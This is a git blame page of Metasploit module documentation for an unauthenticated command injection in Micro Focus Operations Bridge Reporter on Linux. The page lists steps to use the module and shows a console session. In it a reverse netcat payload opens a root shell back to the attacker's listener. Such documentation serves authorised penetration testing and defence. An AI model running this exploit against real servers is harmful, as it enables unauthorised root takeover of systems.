Files
metasploit-gs/documentation/modules/exploit/linux/http/microfocus_obr_cmd_injection.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

51 lines
2.0 KiB
Markdown
Raw Normal View History

2021-04-23 21:04:36 +07:00
## Vulnerable Application
This module exploits a command injection vulnerability on *login* (yes, you read that right) that affects Micro Focus Operations
Bridge Reporter on Linux, versions 10.40 and below.
It's a straight up command injection, with little escaping required and it works before authentication.
This module has been tested on the Linux 10.40 version. Older versions might be affected, check the advisory for details.
Installation docs are available at:
* https://docs.microfocus.com/itom/Operations_Bridge_Reporter:10.40/Home
Vulnerable versions of the software can be downloaded from Micro Focus website by requesting a demo.
This vulnerability only affects Linux installations.
2023-10-10 14:46:18 -04:00
All details about this vulnerability can be obtained from the advisory:
2021-04-23 21:04:36 +07:00
* https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md
## Verification Steps
1. Install the application
2. Start msfconsole
3. `use exploit/multi/http/microfocus_obr_cmd_injection`
4. `set payload PAYLOAD`
2021-04-25 11:02:54 +08:00
5. `set rhost TARGET`
2021-04-23 21:04:36 +07:00
6. `set lhost YOUR_IP`
7. `run`
8. You should get a shell.
## Scenarios
```
2025-07-17 09:53:40 +01:00
msf > use exploit/linux/http/microfocus_obr_cmd_injection
msf exploit(linux/http/microfocus_obr_cmd_injection) > set payload payload/cmd/unix/reverse_netcat
2021-04-23 21:04:36 +07:00
payload => cmd/unix/reverse_netcat
2025-07-17 09:53:40 +01:00
msf exploit(linux/http/microfocus_obr_cmd_injection) > set rhost 10.0.0.10
2021-04-23 21:04:36 +07:00
rhost => 10.0.0.10
2025-07-17 09:53:40 +01:00
msf exploit(linux/http/microfocus_obr_cmd_injection) > set lhost 10.0.0.1
2021-04-23 21:04:36 +07:00
lhost => 10.0.0.1
2025-07-17 09:53:40 +01:00
msf exploit(linux/http/microfocus_obr_cmd_injection) > run
2021-04-23 21:04:36 +07:00
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21412 - Payload sent, now wait for Shelly, if she doesn't arrive try again!
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:51806) at 2021-04-23 20:57:02 +0700
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
uname -a
Linux centos7 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
```